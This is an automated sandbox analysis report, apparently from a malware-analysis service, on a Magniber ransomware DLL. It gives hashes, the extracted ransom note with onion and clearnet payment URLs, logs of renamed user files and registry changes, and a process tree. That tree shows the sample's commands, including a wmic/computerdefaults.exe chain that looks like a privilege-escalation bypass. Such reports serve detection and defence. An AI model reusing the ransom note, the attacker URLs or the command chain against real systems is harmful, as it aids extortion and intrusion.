magniber | 22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51

Resubmissions

19-08-2021 01:57

210819-7xxlq9brfj 10

18-08-2021 02:00

210818-eve5hlsnke 10

Analysis

max time kernel
142s
max time network
117s
platform
windows10_x64
resource
win10v20210410
submitted
18-08-2021 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll
Size

21KB
MD5

f9147aeda18f71043955420e853b8d3c
SHA1

a9c6995a91ac8ac6c76379fd38c3fb973273d3b3
SHA256

22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51
SHA512

3e38ce57ada7a3fc22c2caf6a882574427c3d0b73cbfc337853017995f27688a5f344157f893f1a70cec2ced15a4a553010031b54e813cacb430670ecd8c251f

Score

10^/10

magniber persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://98481068807c5cb026dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://98481068807c5cb026dgvzumt.codehes.uno/dgvzumt http://98481068807c5cb026dgvzumt.partscs.site/dgvzumt http://98481068807c5cb026dgvzumt.uponmix.xyz/dgvzumt http://98481068807c5cb026dgvzumt.flysex.space/dgvzumt Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://98481068807c5cb026dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt

http://98481068807c5cb026dgvzumt.codehes.uno/dgvzumt

http://98481068807c5cb026dgvzumt.partscs.site/dgvzumt

http://98481068807c5cb026dgvzumt.uponmix.xyz/dgvzumt

http://98481068807c5cb026dgvzumt.flysex.space/dgvzumt

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3640	1168	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	1168	cmd.exe	85

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies extensions of user files 14 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

rundll32.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\EditDebug.crw => C:\Users\Admin\Pictures\EditDebug.crw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\EnableStep.crw => C:\Users\Admin\Pictures\EnableStep.crw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\MoveSubmit.crw => C:\Users\Admin\Pictures\MoveSubmit.crw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\TestSend.crw => C:\Users\Admin\Pictures\TestSend.crw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ApproveGet.tif => C:\Users\Admin\Pictures\ApproveGet.tif.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\CopyApprove.tif => C:\Users\Admin\Pictures\CopyApprove.tif.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\CompareDeny.crw => C:\Users\Admin\Pictures\CompareDeny.crw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\OptimizeResume.tiff => C:\Users\Admin\Pictures\OptimizeResume.tiff.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromMove.tif => C:\Users\Admin\Pictures\ConvertFromMove.tif.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\InitializeDismount.raw => C:\Users\Admin\Pictures\InitializeDismount.raw.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\JoinInvoke.crw => C:\Users\Admin\Pictures\JoinInvoke.crw.dgvzumt	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\OptimizeResume.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ProtectCheckpoint.tif => C:\Users\Admin\Pictures\ProtectCheckpoint.tif.dgvzumt	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ResolveReceive.tif => C:\Users\Admin\Pictures\ResolveReceive.tif.dgvzumt	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

rundll32.exe

description	pid	Process
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe
PID 3168 set thread context of 0	3168	rundll32.exe

Drops file in Windows directory 2 IoCs

Processes:

MicrosoftEdge.exeunregmp2.exe

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\win.ini	unregmp2.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

Processes:

ie4uinit.exeie4uinit.exeMicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "12"	ie4uinit.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeunregmp2.exeMicrosoftEdgeCP.exeie4uinit.exeunregmp2.exeMicrosoftEdge.exeie4uinit.exeMicrosoftEdgeCP.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mpeg	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheLimit = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml\Content Type = "application/xhtml+xml"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.mpe	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.wmv	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.WTV\OpenWithProgIds\WMP.WTVFile = "0"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-914"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.asf	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-53504"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867}	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-ms-wma\CLSID = "{cd3afa84-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\telnet	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.aac\ = "WMP11.AssocFile.ADTS"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\CacheP = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\DefaultIcon\ = "%SystemRoot%\\system32\\ieframe.dll,-211"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wmx\ = "WMP11.AssocFile.ASX"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-mpg\CLSID = "{cd3afa76-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rmi\ = "WMP11.AssocFile.MIDI"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieco = "MicrosoftEdge\\IECompatCache"
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.wmv\MPlayer2.BAK = "VLC.wmv"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.wma	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-ms-wmd\Extension = ".wmd"	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\RACProvisionStatus-006 = "1"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\telnet\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-907"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/mpg	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-ms-asf	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mailto\DefaultIcon\ = "%SystemRoot%\\system32\\url.dll,2"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.adts	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.flac	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.m2t	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Cach = "MicrosoftEdge_EmieSiteList:"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.mkv\ = "WMP11.AssocFile.MKV"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.tts	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.mp4	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\opennew	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.avi	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wmd	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.m2v\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\DefaultIcon	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.snd	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\ = "Open in S&ame Window"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.mod\OpenWithProgIds	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-msvideo\Extension = ".avi"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shell\open\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/midi	unregmp2.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
2800	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
3168	rundll32.exe
3168	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
2888

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

rundll32.exeMicrosoftEdgeCP.exe

pid	Process
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
3168	rundll32.exe
4292	MicrosoftEdgeCP.exe
4292	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe
Token: 35	2816	WMIC.exe
Token: 36	2816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe
Token: 35	2816	WMIC.exe
Token: 36	2816	WMIC.exe
Token: SeShutdownPrivilege	2888
Token: SeCreatePagefilePrivilege	2888

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

ComputerDefaults.exeComputerDefaults.exe

pid	Process
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2044	ComputerDefaults.exe
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
2888
812	ComputerDefaults.exe

Suspicious use of SendNotifyMessage 8 IoCs

Processes:

pid	Process
2888
2888
2888
2888
2888
2888
2888
2888

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	Process
2888
1500	MicrosoftEdge.exe
4292	MicrosoftEdgeCP.exe
4292	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

pid	Process
2888
3520

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.exeMicrosoftEdgeCP.exeComputerDefaults.exeComputerDefaults.exe

description	pid	Process	procid_target
PID 3168 wrote to memory of 2800	3168	rundll32.exe	75
PID 3168 wrote to memory of 2800	3168	rundll32.exe	75
PID 3168 wrote to memory of 1832	3168	rundll32.exe	76
PID 3168 wrote to memory of 1832	3168	rundll32.exe	76
PID 3168 wrote to memory of 756	3168	rundll32.exe	78
PID 3168 wrote to memory of 756	3168	rundll32.exe	78
PID 3168 wrote to memory of 1900	3168	rundll32.exe	79
PID 3168 wrote to memory of 1900	3168	rundll32.exe	79
PID 1900 wrote to memory of 2816	1900	cmd.exe	83
PID 1900 wrote to memory of 2816	1900	cmd.exe	83
PID 756 wrote to memory of 3972	756	cmd.exe	84
PID 756 wrote to memory of 3972	756	cmd.exe	84
PID 2140 wrote to memory of 812	2140	cmd.exe	92
PID 2140 wrote to memory of 812	2140	cmd.exe	92
PID 3640 wrote to memory of 2044	3640	cmd.exe	91
PID 3640 wrote to memory of 2044	3640	cmd.exe	91
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 4292 wrote to memory of 4744	4292	MicrosoftEdgeCP.exe	100
PID 2044 wrote to memory of 4944	2044	ComputerDefaults.exe	102
PID 2044 wrote to memory of 4944	2044	ComputerDefaults.exe	102
PID 2044 wrote to memory of 4984	2044	ComputerDefaults.exe	103
PID 2044 wrote to memory of 4984	2044	ComputerDefaults.exe	103
PID 812 wrote to memory of 1172	812	ComputerDefaults.exe	105
PID 812 wrote to memory of 1172	812	ComputerDefaults.exe	105
PID 812 wrote to memory of 4620	812	ComputerDefaults.exe	106
PID 812 wrote to memory of 4620	812	ComputerDefaults.exe	106
PID 2888 wrote to memory of 4592	2888		108
PID 2888 wrote to memory of 4592	2888		108

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2800
- C:\Windows\system32\cmd.exe
  cmd /c "start http://98481068807c5cb026dgvzumt.codehes.uno/dgvzumt^&1^&42615854^&86^&349^&2215063"
  2⤵
  - Checks computer location settings
  PID:1832
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3972
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2816

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\System32\ie4uinit.exe
    "C:\Windows\System32\ie4uinit.exe" -reinstall
    3⤵
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:4944
- - C:\Windows\system32\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
    3⤵
    - Drops file in Windows directory
    - Modifies registry class
    PID:4984

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\System32\ie4uinit.exe
    "C:\Windows\System32\ie4uinit.exe" -reinstall
    3⤵
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:1172
- - C:\Windows\system32\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
    3⤵
    - Modifies registry class
    PID:4620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
